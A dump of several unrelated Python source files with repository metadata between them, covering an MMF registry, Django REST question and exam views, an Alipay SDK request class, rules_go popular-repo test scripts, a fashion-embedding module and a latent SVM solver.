def wrap(func):
from mmf.datasets.processors.processors import BaseProcessor
assert issubclass(
func, BaseProcessor
), "All Processor classes must inherit BaseProcessor class"
cls.mapping["processor_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_optimizer(cls, name):
def wrap(func):
cls.mapping["optimizer_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_scheduler(cls, name):
def wrap(func):
cls.mapping["scheduler_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_decoder(cls, name):
r"""Register a decoder to registry with key 'name'
Args:
name: Key with which the decoder will be registered.
Usage::
from mmf.common.registry import registry
from mmf.utils.text import TextDecoder
@registry.register_decoder("nucleus_sampling")
class NucleusSampling(TextDecoder):
...
"""
def wrap(decoder_cls):
from mmf.utils.text import TextDecoder
assert issubclass(
decoder_cls, TextDecoder
), "All decoders must inherit TextDecoder class"
cls.mapping["decoder_name_mapping"][name] = decoder_cls
return decoder_cls
return wrap
@classmethod
def register(cls, name, obj):
r"""Register an item to registry with key 'name'
Args:
name: Key with which the item will be registered.
Usage::
from mmf.common.registry import registry
registry.register("config", {})
"""
path = name.split(".")
current = cls.mapping["state"]
for part in path[:-1]:
if part not in current:
current[part] = {}
current = current[part]
current[path[-1]] = obj
@classmethod
def get_trainer_class(cls, name):
return cls.mapping["trainer_name_mapping"].get(name, None)
@classmethod
def get_builder_class(cls, name):
return cls.mapping["builder_name_mapping"].get(name, None)
@classmethod
def get_model_class(cls, name):
return cls.mapping["model_name_mapping"].get(name, None)
@classmethod
def get_processor_class(cls, name):
return cls.mapping["processor_name_mapping"].get(name, None)
@classmethod
def get_metric_class(cls, name):
return cls.mapping["metric_name_mapping"].get(name, None)
@classmethod
def get_loss_class(cls, name):
return cls.mapping["loss_name_mapping"].get(name, None)
@classmethod
def get_optimizer_class(cls, name):
return cls.mapping["optimizer_name_mapping"].get(name, None)
@classmethod
def get_scheduler_class(cls, name):
return cls.mapping["scheduler_name_mapping"].get(name, None)
@classmethod
def get_decoder_class(cls, name):
return cls.mapping["decoder_name_mapping"].get(name, None)
@classmethod
def get(cls, name, default=None, no_warning=False):
r"""Get an item from registry with key 'name'
Args:
name (string): Key whose value needs to be retrieved.
default: If passed and key is not in registry, default value will
be returned with a warning. Default: None
no_warning (bool): If passed as True, warning when key doesn't exist
will not be generated. Useful for MMF's
internal operations. Default: False
Usage::
from mmf.common.registry import registry
config = registry.get("config")
"""
original_name = name
name = name.split(".")
value = cls.mapping["state"]
for subname in name:
value = value.get(subname, default)
if value is default:
break
if (
"writer" in cls.mapping["state"]
and value == default
and no_warning is False
):
cls.mapping["state"]["writer"].write(
"Key {} is not present in registry, returning default value "
"of {}".format(original_name, default)
)
return value
@classmethod
def unregister(cls, name):
r"""Remove an item from registry with key 'name'
Args:
name: Key which needs to be removed.
Usage::
from mmf.common.registry import registry
config = registry.unregister("config")
"""
return cls.mapping["state"].pop(name, None)
registry = Registry()
setup_imports()
| 28.539024
| 80
| 0.597214
|
a8baa06a1f4f9569c0e3b5773b6e905103f2b117
| 5,467
|
py
|
Python
|
UCourse/questions/views.py
|
Natsu1270/UCourse
|
e8c814d91e54f5f51e4a0fa2df177ebb59544dc2
|
[
"MIT"
] | 1
|
2020-08-31T22:40:27.000Z
|
2020-08-31T22:40:27.000Z
|
UCourse/questions/views.py
|
Natsu1270/UCourse
|
e8c814d91e54f5f51e4a0fa2df177ebb59544dc2
|
[
"MIT"
] | 13
|
2020-08-05T16:17:09.000Z
|
2022-03-12T00:18:42.000Z
|
UCourse/questions/views.py
|
Natsu1270/UCourse
|
e8c814d91e54f5f51e4a0fa2df177ebb59544dc2
|
[
"MIT"
] | null | null | null |
from django.db.models import Q
from rest_framework import generics, permissions, status
from rest_framework.response import Response
from questions import serializers
from questions.models import Question, Choice
from exams.models import Exam
from copy import deepcopy
class QuestionDetailAPI(generics.RetrieveUpdateDestroyAPIView):
permission_classes = [
permissions.IsAuthenticated
]
serializer_class = serializers.QuestionSerializer
queryset = Question.objects.all()
class QuestionListAPI(generics.ListCreateAPIView):
permission_classes = [
permissions.IsAuthenticated
]
serializer_class = serializers.QuestionSerializer
queryset = Question.objects.all()
class CreateQuestionAPI(generics.GenericAPIView):
serializer_class = serializers.QuestionMinSerializer
permission_classes = [
permissions.IsAuthenticated
]
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
exam_id = request.data.get('exam', None)
choices = request.data.get('choices', [])
serializer.is_valid(raise_exception=True)
data = serializer.validated_data
question = serializer.save()
if exam_id is not None:
exam = Exam.objects.get(pk=request.data['exam'])
question.question_exams.add(exam)
question.save()
for choice in choices:
new_choice = Choice.objects.create(content=choice['content'])
question.choices.add(new_choice)
if choice['isAnswer'] and choice['isAnswer'] is True:
question.answers.add(new_choice)
question.created_by = self.request.user
question.save()
return Response({
"data": serializers.QuestionSerializer(instance=question).data,
"result": True,
"message": "Register successfully",
"status_code": 201
}, status=status.HTTP_201_CREATED)
class EditQuestionAPI(generics.GenericAPIView):
serializer_class = serializers.QuestionMinSerializer
permission_classes = [permissions.IsAuthenticated]
def post(self, request, *args, **kwargs):
choices = request.data['choices']
question_id = request.data['id']
instance = Question.objects.get(pk=question_id)
serializer = self.get_serializer(instance, data=request.data, partial=True)
serializer.is_valid(raise_exception=True)
question = serializer.save()
old_choices = instance.choices
old_answers = instance.answers
new_choice_ids = list()
for choice in choices:
if 'id' in choice and choice['id']:
new_choice_ids.append(choice['id'])
old_choice = old_choices.get(pk=choice['id'])
old_choice.content = choice['content']
old_choice.save()
is_answers = old_answers.filter(pk=choice['id'])
if len(is_answers) == 0 and (choice['isAnswer'] and choice['isAnswer'] is True):
question.answers.add(old_choice)
if len(is_answers) > 0 and (choice['isAnswer'] is None or choice['isAnswer'] is False):
question.answers.remove(old_choice)
else:
new_choice = Choice.objects.create(content=choice['content'])
new_choice_ids.append(new_choice.id)
question.choices.add(new_choice)
if choice['isAnswer'] and choice['isAnswer'] is True:
question.answers.add(new_choice)
for choice in old_choices.all():
if choice.id not in new_choice_ids:
choice.delete()
question = question.save()
return Response({
"data": serializers.QuestionSerializer(instance=question).data,
"result": True, "message": "Edit question successfully", "status_code": 201
}, status=status.HTTP_200_OK)
class GetQuestionsByTeacher(generics.GenericAPIView):
permission_classes = [permissions.IsAuthenticated]
def get(self, request, *args, **kwargs):
user = self.request.user
queryset = Question.objects.filter(created_by=user).order_by('-created_date')
return Response(
data=serializers.QuestionSerializer(instance=queryset, many=True).data,
status=status.HTTP_200_OK
)
class GetQuestionsByTeacherRemain(generics.GenericAPIView):
permission_classes = [permissions.IsAuthenticated]
def get(self, request, *args, **kwargs):
user = self.request.user
exam_id = self.request.query_params.get('examId')
exam = Exam.objects.get(pk=exam_id)
queryset = Question.objects.filter(Q(created_by=user) & ~Q(question_exams__in=[exam])).order_by('-created_date')
return Response(
data=serializers.QuestionSerializer(instance=queryset, many=True).data,
status=status.HTTP_200_OK
)
class AddToExam(generics.GenericAPIView):
permission_classes = [permissions.IsAuthenticated]
def post(self, request, *args, **kwargs):
exam_id = self.request.data.get('examId')
exam = Exam.objects.get(pk=exam_id)
rows = self.request.data.get('rows')
for question_id in rows:
exam.questions.add(question_id)
exam.save()
return Response({
"result": True
}, status=status.HTTP_200_OK)
| 35.5
| 120
| 0.651546
|
4d0dde9e150e96ac17d650e26fcd21708ec64c2f
| 98
|
py
|
Python
|
IAF/layers/__init__.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
IAF/layers/__init__.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
IAF/layers/__init__.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
from IAF.layers.linear import LinearVariational
from IAF.layers.autoregressive import LinearMasked
| 49
| 50
| 0.887755
|
77291388aef5b8fe94df0a92ffb88ce80d27746d
| 465
|
py
|
Python
|
minigest/fisco/viewsets/natura_operazione_iva.py
|
ctrlmaniac/minigest
|
2bfceb57e41c872e4112e24d0e6991164846888b
|
[
"MIT"
] | null | null | null |
minigest/fisco/viewsets/natura_operazione_iva.py
|
ctrlmaniac/minigest
|
2bfceb57e41c872e4112e24d0e6991164846888b
|
[
"MIT"
] | 1
|
2021-09-22T19:10:20.000Z
|
2021-09-22T19:10:20.000Z
|
minigest/fisco/viewsets/natura_operazione_iva.py
|
ctrlmaniac/minigest
|
2bfceb57e41c872e4112e24d0e6991164846888b
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from rest_framework import permissions, viewsets
from ..models import NaturaOperazioneIVA
from ..serializers import NaturaOperazioneIVASerializer
permission = permissions.AllowAny if settings.DEBUG else permissions.IsAuthenticated
class NaturaOperazioneIVAViewSet(viewsets.ModelViewSet):
permission_classes = [permission]
queryset = NaturaOperazioneIVA.objects.all()
serializer_class = NaturaOperazioneIVASerializer
| 33.214286
| 84
| 0.84086
|
ba8484d67d3402df53526f4655dd8c886a795620
| 199
|
py
|
Python
|
testData/search/grandChildKeywordArgumentWithPythonClass.py
|
alek-sun/pydantic-pycharm-plugin
|
6b07519aadf0ff8b8a644c1f9ede88e09c687c80
|
[
"Apache-2.0",
"MIT"
] | 238
|
2019-08-05T12:46:09.000Z
|
2022-03-25T08:53:25.000Z
|
testData/search/grandChildKeywordArgumentWithPythonClass.py
|
alek-sun/pydantic-pycharm-plugin
|
6b07519aadf0ff8b8a644c1f9ede88e09c687c80
|
[
"Apache-2.0",
"MIT"
] | 415
|
2019-07-15T17:39:35.000Z
|
2022-03-31T01:18:38.000Z
|
testData/search/grandChildKeywordArgumentWithPythonClass.py
|
collerek/pydantic-pycharm-plugin
|
7068ece42334cc9fbe927d779d199c86d5139888
|
[
"Apache-2.0",
"MIT"
] | 7
|
2019-08-09T01:03:16.000Z
|
2022-02-08T03:28:19.000Z
|
from pydantic import BaseModel, validator
class A(BaseModel):
pass
class B(A):
pass
class D:
pass
class C(B, D):
pass
A(abc='cde')
B(abc='cde')
C(ab<caret>c='cde')
## count: 0
| 9.47619
| 41
| 0.603015
|
c4489da0bf4aed6aface1a931557eaff74b55e98
| 3,986
|
py
|
Python
|
alipay/aop/api/request/ZhimaCreditPeZmgoAgreementQueryRequest.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/request/ZhimaCreditPeZmgoAgreementQueryRequest.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/request/ZhimaCreditPeZmgoAgreementQueryRequest.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ZhimaCreditPeZmgoAgreementQueryModel import ZhimaCreditPeZmgoAgreementQueryModel
class ZhimaCreditPeZmgoAgreementQueryRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, ZhimaCreditPeZmgoAgreementQueryModel):
self._biz_content = value
else:
self._biz_content = ZhimaCreditPeZmgoAgreementQueryModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'zhima.credit.pe.zmgo.agreement.query'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| 27.489655
| 148
| 0.64576
|
e24ada44bd2fdf1df6a5105db9607918a2b01ace
| 2,526
|
py
|
Python
|
instr.py
|
frorruchi/HeartCheck
|
2e2dd3dfaaad2c1166c10ff6352d4170c3a41604
|
[
"CC0-1.0"
] | null | null | null |
instr.py
|
frorruchi/HeartCheck
|
2e2dd3dfaaad2c1166c10ff6352d4170c3a41604
|
[
"CC0-1.0"
] | null | null | null |
instr.py
|
frorruchi/HeartCheck
|
2e2dd3dfaaad2c1166c10ff6352d4170c3a41604
|
[
"CC0-1.0"
] | null | null | null |
from PyQt5.QtCore import QTime
win_x, win_y = 200, 100
win_width, win_height = 1000, 600
txt_hello = 'Добро пожаловать в программу по определению состояния здоровья!'
txt_next = 'Начать'
txt_instruction = ('Данное приложение позволит вам с помощью теста Руфье провести первичную диагностику вашего здоровья.\n'
'Проба Руфье представляет собой нагрузочный комплекс, предназначенный для оценки работоспособности сердца при физической нагрузке.\n'
'У испытуемого, находящегося в положении лежа на спине в течение 5 мин, определяют частоту пульса за 15 секунд;\n'
'затем в течение 45 секунд испытуемый выполняет 30 приседаний.\n'
'После окончания нагрузки испытуемый ложится, и у него вновь подсчитывается число пульсаций за первые 15 секунд,\n'
'а потом — за последние 15 секунд первой минуты периода восстановления.\n'
'Важно! Если в процессе проведения испытания вы почувствуете себя плохо (появится головокружение, шум в\n'
'ушах, сильная одышка и др.), то тест необходимо прервать и обратиться к врачу.' )
txt_title = 'Здоровье'
txt_name = 'Введите Ф.И.О.:'
txt_hintname = "Ф.И.О."
txt_hintage = "0"
txt_test1 = 'Лягте на спину и замерьте пульс за 15 секунд. Нажмите кнопку "Начать первый тест", чтобы запустить таймер.\nРезультат запишите в соответствующее поле.'
txt_test2 = 'Выполните 30 приседаний за 45 секунд. Для этого нажмите кнопку "Начать делать приседания",\nчтобы запустить счетчик приседаний.'
txt_test3 = 'Лягте на спину и замерьте пульс сначала за первые 15 секунд минуты, затем за последние 15 секунд.\nНажмите кнопку "Начать финальный тест", чтобы запустить таймер.\nЗеленым обозначены секунды, в течение которых необходимо \nпроводить измерения, черным - минуты без замера пульсаций. Результаты запишите в соответствующие поля.'
txt_sendresults = 'Отправить результаты'
txt_hinttest1 = '0'
txt_hinttest2 = '0'
txt_hinttest3 = '0'
txt_starttest1 = 'Начать первый тест'
txt_starttest2 = 'Начать делать приседания'
txt_starttest3 = 'Начать финальный тест'
time = QTime(0, 0, 15)
txt_timer = time.toString("hh:mm:ss")
txt_age = 'Полных лет:'
txt_finalwin = 'Результаты'
txt_index = 'Индекс Руфье: '
txt_workheart = 'Работоспособность сердца: '
txt_res1 = "низкая. Срочно обратитесь к врачу!"
txt_res2 = "удовлетворительная. Обратитесь к врачу!"
txt_res3 = "средняя. Возможно, стоит дополнительно обследоваться у врача."
txt_res4 = "выше среднего"
txt_res5 = "высокая"
| 60.142857
| 339
| 0.743864
|
81315adf065f888b24ce615f455cdf34ec25c8de
| 2,557
|
py
|
Python
|
mmfashion/models/embed_extractor/embed_extract.py
|
RyanJiang0416/mmfashion
|
89f56e3e631b4f5c1403f7e8897396cc02b5aa91
|
[
"Apache-2.0"
] | 952
|
2019-10-31T01:49:07.000Z
|
2022-03-29T11:33:27.000Z
|
mmfashion/models/embed_extractor/embed_extract.py
|
RyanJiang0416/mmfashion
|
89f56e3e631b4f5c1403f7e8897396cc02b5aa91
|
[
"Apache-2.0"
] | 135
|
2019-11-02T07:09:04.000Z
|
2022-03-17T06:08:11.000Z
|
mmfashion/models/embed_extractor/embed_extract.py
|
RyanJiang0416/mmfashion
|
89f56e3e631b4f5c1403f7e8897396cc02b5aa91
|
[
"Apache-2.0"
] | 239
|
2019-10-31T02:08:40.000Z
|
2022-03-22T03:14:38.000Z
|
import torch.nn as nn
from ..builder import build_loss
from ..registry import EMBEDEXTRACTOR
@EMBEDEXTRACTOR.register_module
class EmbedExtractor(nn.Module):
def __init__(self,
inchannels,
inter_channels,
loss_id=dict(
type='CELoss',
ratio=1,
weight=None,
size_average=None,
reduce=None,
reduction='mean'),
loss_triplet=dict(type='TripletLoss', method='cosine')):
super(EmbedExtractor, self).__init__()
self.embed_linear = nn.Linear(inchannels, inter_channels[0])
self.bn = nn.BatchNorm1d(inter_channels[0], inter_channels[1])
self.id_linear = nn.Linear(inter_channels[0], inter_channels[1])
self.loss_id = build_loss(loss_id)
if loss_triplet is not None:
self.loss_triplet = build_loss(loss_triplet)
else:
self.loss_triplet = None
def forward_train(self, x, id, triplet, pos, neg, triplet_pos_label,
triplet_neg_label):
embed = self.embed_linear(x)
id_pred = self.id_linear(embed)
loss_id = self.loss_id(id_pred, id)
if triplet:
pos_embed = self.embed_linear(pos)
neg_embed = self.embed_linear(neg)
loss_triplet = self.loss_triplet(embed, pos_embed, neg_embed,
triplet_pos_label,
triplet_neg_label)
return loss_id + loss_triplet
else:
return loss_id
def forward_test(self, x):
embed = self.embed_linear(x)
return embed
def forward(self,
x,
id,
return_loss=False,
triplet=False,
pos=None,
neg=None,
triplet_pos_label=None,
triplet_neg_label=None):
if return_loss:
return self.forward_train(x, id, triplet, pos, neg,
triplet_pos_label, triplet_neg_label)
else:
return self.forward_test(x)
def init_weights(self):
nn.init.xavier_uniform_(self.embed_linear.weight)
if self.embed_linear.bias is not None:
self.embed_linear.bias.data.fill_(0.01)
nn.init.xavier_uniform_(self.id_linear.weight)
if self.id_linear.bias is not None:
self.id_linear.bias.data.fill_(0.01)
| 33.644737
| 75
| 0.550645
|
c8361bcef7c06cb1273dbad3f1c02709bf4674b0
| 9,356
|
py
|
Python
|
tests/integration/popular_repos/popular_repos.py
|
hiro511/rules_go
|
a9a8548ceb9abdd7293df1a77e3917238ddfdccd
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/popular_repos/popular_repos.py
|
hiro511/rules_go
|
a9a8548ceb9abdd7293df1a77e3917238ddfdccd
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/popular_repos/popular_repos.py
|
hiro511/rules_go
|
a9a8548ceb9abdd7293df1a77e3917238ddfdccd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from subprocess import check_output, call
from sys import exit
POPULAR_REPOS = [
dict(
name = "org_golang_x_crypto",
importpath = "golang.org/x/crypto",
urls = ["https://codeload.github.com/golang/crypto/zip/81e90905daefcd6fd217b62423c0908922eadb30"],
strip_prefix = "crypto-81e90905daefcd6fd217b62423c0908922eadb30",
type = "zip",
excludes = [
"ssh/agent:go_default_test",
"ssh:go_default_test",
"ssh/test:go_default_test",
],
),
dict(
name = "org_golang_x_net",
importpath = "golang.org/x/net",
commit = "57efc9c3d9f91fb3277f8da1cff370539c4d3dc5",
excludes = [
"bpf:go_default_test", # Needs testdata directory
"html/charset:go_default_test", # Needs testdata directory
"http2:go_default_test", # Needs testdata directory
"icmp:go_default_xtest", # icmp requires adjusting kernel options.
"nettest:go_default_test", #
"lif:go_default_test",
],
darwin_tests = [
"route:go_default_test", # Not supported on linux
]
),
dict(
name = "org_golang_x_sys",
importpath = "golang.org/x/sys",
commit = "0b25a408a50076fbbcae6b7ac0ea5fbb0b085e79",
excludes = [
"unix:go_default_xtest", # TODO(#413): External test depends on symbols defined in internal test.
],
),
dict(
name = "org_golang_x_text",
importpath = "golang.org/x/text",
commit = "a9a820217f98f7c8a207ec1e45a874e1fe12c478",
excludes = [
"encoding/japanese:go_default_test", # Needs testdata directory
"encoding/korean:go_default_test", # Needs testdata directory
"encoding/charmap:go_default_test", # Needs testdata directory
"encoding/simplifiedchinese:go_default_test", # Needs testdata directory
"encoding/traditionalchinese:go_default_test", # Needs testdata directory
"encoding/unicode/utf32:go_default_test", # Needs testdata directory
"encoding/unicode:go_default_test", # Needs testdata directory
],
),
dict(
name = "org_golang_x_tools",
importpath = "golang.org/x/tools",
commit = "663269851cdddc898f963782f74ea574bcd5c814",
excludes = [
"cmd/bundle:go_default_test", # Needs testdata directory
"cmd/callgraph:go_default_test", # Needs testdata directory
"cmd/cover:go_default_xtest", # Needs testdata directory
"cmd/guru:go_default_xtest", # Needs testdata directory
"cmd/stringer:go_default_test", # Needs testdata directory
"go/buildutil:go_default_xtest", # Needs testdata directory
"go/callgraph/cha:go_default_xtest", # Needs testdata directory
"go/callgraph/rta:go_default_xtest", # Needs testdata directory
"go/gccgoexportdata:go_default_xtest", # Needs testdata directory
"go/gcexportdata:go_default_xtest", # Needs testdata directory
"go/gcimporter15:go_default_test", # Needs testdata directory
"go/internal/gccgoimporter:go_default_test", # Needs testdata directory
"go/loader:go_default_xtest", # Needs testdata directory
"go/pointer:go_default_xtest", # Needs testdata directory
"go/ssa/interp:go_default_xtest", # Needs testdata directory
"go/ssa/ssautil:go_default_xtest", # Needs testdata directory
"go/ssa:go_default_xtest", # Needs testdata directory
"refactor/eg:go_default_xtest", # Needs testdata directory
"cmd/fiximports:go_default_test", # requires working GOROOT, not present in CI.
"cmd/godoc:go_default_xtest", # TODO(#417)
"cmd/gorename:go_default_xtest", # TODO(#417)
"go/gcimporter15:go_default_xtest", # TODO(#417)
"refactor/importgraph:go_default_xtest", # TODO(#417)
"refactor/rename:go_default_test", # TODO(#417)
"cmd/guru/testdata/src/referrers:go_default_xtest", # Not a real test
"cmd/guru/testdata/src/referrers:go_default_test", # Not a real test
"container/intsets:go_default_xtest", # TODO(#413): External test depends on symbols defined in internal test.
],
),
dict(
name = "org_golang_google_grpc",
importpath = "google.golang.org/grpc",
commit = "3f10311ccf076b6b7cba28273df3290d42e60982",
# GRPC has already-generated protobuf definitions, and we don't currently
# register any protobuf toolchains in this WORKSPACE. As such, the build
# should fail if we try to generate protobuf rules, but succeed if we
# disable generation.
build_file_proto_mode = "disable",
excludes = [
"test:go_default_test",
"examples/route_guide/mock_routeguide:go_default_xtest",
"examples/helloworld/mock_helloworld:go_default_xtest",
"credentials:go_default_test",
":go_default_test",
],
),
dict(
name = "com_github_mattn_go_sqlite3",
importpath = "github.com/mattn/go-sqlite3",
commit = "83772a7051f5e30d8e59746a9e43dfa706b72f3b",
excludes = [],
),
]
COPYRIGHT_HEADER = """
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################
# Generated file, do not edit!
##############################
""".strip()
BZL_HEADER = COPYRIGHT_HEADER + """
load("@io_bazel_rules_go//go/private:go_repository.bzl", "go_repository")
def _maybe(repo_rule, name, **kwargs):
if name not in native.existing_rules():
repo_rule(name=name, **kwargs)
def popular_repos():
"""
BUILD_HEADER = COPYRIGHT_HEADER
DOCUMENTATION_HEADER = """
Popular repository tests
========================
These tests are designed to check that gazelle and rules_go together can cope
with a list of popluar repositories people depend on.
It helps catch changes that might break a large number of users.
.. contents::
""".lstrip()
def popular_repos_bzl():
with open("popular_repos.bzl", "w") as f:
f.write(BZL_HEADER)
for repo in POPULAR_REPOS:
f.write(" _maybe(\n go_repository,\n")
for k in ["name", "importpath", "commit", "strip_prefix", "type", "build_file_proto_mode"]:
if k in repo: f.write(' {}="{}",\n'.format(k, repo[k]))
for k in ["urls"]:
if k in repo: f.write(' {}={},\n'.format(k, repo[k]))
f.write(" )\n")
def build_bazel():
with open("BUILD.bazel", "w") as f:
f.write(BUILD_HEADER)
for repo in POPULAR_REPOS:
name = repo["name"]
tests = check_output(["bazel", "query", "kind(go_test, \"@{}//...\")".format(name)]).split("\n")
excludes = ["@{}//{}".format(name, l) for l in repo.get("excludes", [])]
for k in repo:
if k.endswith("_excludes") or k.endswith("_tests"):
excludes.extend(["@{}//{}".format(name, l) for l in repo[k]])
invalid_excludes = [t for t in excludes if not t in tests]
if invalid_excludes:
exit("Invalid excludes found: {}".format(invalid_excludes))
f.write('\ntest_suite(\n')
f.write(' name = "{}",\n'.format(name))
f.write(' tests = [\n')
actual = []
for test in sorted(tests, key=lambda test: test.replace(":", "!")):
if test in excludes or not test: continue
f.write(' "{}",\n'.format(test))
actual.append(test)
f.write(' ],\n')
#TODO: add in the platform "select" tests
f.write(')\n')
repo["actual"] = actual
def readme_rst():
with open("README.rst", "w") as f:
f.write(DOCUMENTATION_HEADER)
for repo in POPULAR_REPOS:
name = repo["name"]
f.write("{}\n{}\n\n".format(name, "_"*len(name)))
f.write("This runs tests from the repository `{0} <https://{0}>`_\n\n".format(repo["importpath"]))
for test in repo["actual"]:
f.write("* {}\n".format(test))
f.write("\n\n")
def main():
popular_repos_bzl()
build_bazel()
readme_rst()
if __name__ == "__main__":
main()
| 39.476793
| 122
| 0.639376
|
6db641f33d18662a78aff01101cd79de86cf0fcd
| 3,566
|
py
|
Python
|
mantra/mantra_solver.py
|
durandtibo/mantra-python
|
a35dfd93f92f7f510a212ee5356ae4d776a27849
|
[
"MIT"
] | 1
|
2019-02-22T09:48:04.000Z
|
2019-02-22T09:48:04.000Z
|
mantra/mantra_solver.py
|
durandtibo/mantra-python
|
a35dfd93f92f7f510a212ee5356ae4d776a27849
|
[
"MIT"
] | null | null | null |
mantra/mantra_solver.py
|
durandtibo/mantra-python
|
a35dfd93f92f7f510a212ee5356ae4d776a27849
|
[
"MIT"
] | null | null | null |
import time
from mantra.util.data.labeled_object import LabeledObject
from mantra.util.solver.loss import Loss
from mantra.util.solver.sgd_solver import SGDSolver
from mantra.util.solver.ssg_solver import SSGSolver
class MantraLoss(Loss):
def __str__(self):
return "MantraLoss"
def evaluate(self, model, x, y):
""" Evaluate the loss for the given model, pattern and label. The return value is a scalar.
- model: model
- x: pattern
- y: label """
# compute the loss augmented inference
y_star, h_star = self.max_oracle(model, x, y)
# compute the best latent value for label y
h_bar = model.predict(x, y)
# compute the loss term
return model.loss(y, y_star) + model.value_of(x, y_star, h_star) - model.value_of(x, y, h_bar)
def compute_gradient(self, model, x, y, y_star2=None):
""" Compute the gradient of the hinge loss for the given model, pattern and label. The return value is a vector.
- model: model
- x: pattern
- y: label """
if y_star2 is None:
# compute the loss augmented inference
y_star, h_star = self.max_oracle(model, x, y)
else:
y_star, h_star = y_star2
if y_star == y:
# for this case, the gradient is zero
return None
# compute the best latent value for label y
h_bar = model.predict(x, y)
# compute the gradient of the loss
return model.sub(model.feature_map(x, y_star, h_star), x, y, h_bar)
def error(self, model, y_truth, y):
""" Compute the loss function
- y_truth: label
- y: label """
return model.loss(y_truth, y)
def max_oracle(self, model, x, y_star):
""" Compute the loss-augmented inference defined in model for pattern x and label y
- x: pattern
- y_star: label
return (label, (h^+, h^-)) """
return model.max_oracle(x, y_star)
def initialize_mantra_data(model, data):
initialized_data = list()
for i in range(len(data)):
pattern = data[i].pattern
label = data[i].label
latent = model.initialize_latent(pattern, label)
initialized_data.append(LabeledObject(pattern, (label, latent)))
return initialized_data
###############################################################################
# MantraWithSGD
###############################################################################
class MantraWithSGD:
def __init__(self, lambdaa=1e-4, num_epochs=25, sample='perm', seed=1, verbose=1, show_debug_every=0):
self.lambdaa = lambdaa
self.num_epochs = num_epochs
self.sample = sample
self.seed = seed
self.verbose = verbose
self.show_debug_every = int(show_debug_every)
def optimize(self, model, data, val_data=None):
solver = SGDSolver(MantraLoss(), self.lambdaa, self.num_epochs, self.sample, self.seed, self.verbose, self.show_debug_every)
